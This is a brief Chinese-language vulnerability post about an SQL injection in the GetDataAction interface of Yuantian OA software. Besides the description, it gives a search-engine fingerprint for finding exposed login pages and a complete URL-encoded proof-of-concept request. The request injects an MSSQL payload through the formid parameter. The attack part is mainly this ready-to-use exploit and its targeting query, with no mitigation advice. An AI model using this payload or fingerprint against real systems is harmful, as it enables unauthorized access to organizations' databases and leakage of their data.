源天OA GetDataAction SQL注入漏洞
# 源天OA GetDataAction SQL注入漏洞
## 漏洞描述
源天OA GetDataAction 接口存在SQL注入漏洞,攻击者通过漏洞可以获取服务器数据库中的数据,造成信息泄漏
## 漏洞影响
源天OA...
源天OA GetDataAction SQL注入漏洞
漏洞描述
源天OA GetDataAction 接口存在SQL注入漏洞,攻击者通过漏洞可以获取服务器数据库中的数据,造成信息泄漏
漏洞影响
源天OA
网络测绘
body="/vmain/login.jsp"
漏洞复现
登录页面
验证POC
/ServiceAction/ServiceAction/com.velcro.base.GetDataAction?action=checkname&formid=-1%27%20OR%207063%20IN%20(SELECT%20(sys.fn_varbintohexstr(hashbytes(%27MD5%27,%271%27))))%20AND%20%27a%27=%27a
- 发表于 2024-07-12 18:45:14
- 阅读 ( 2229 )
- 分类:OA产品
带头大哥
456 篇文章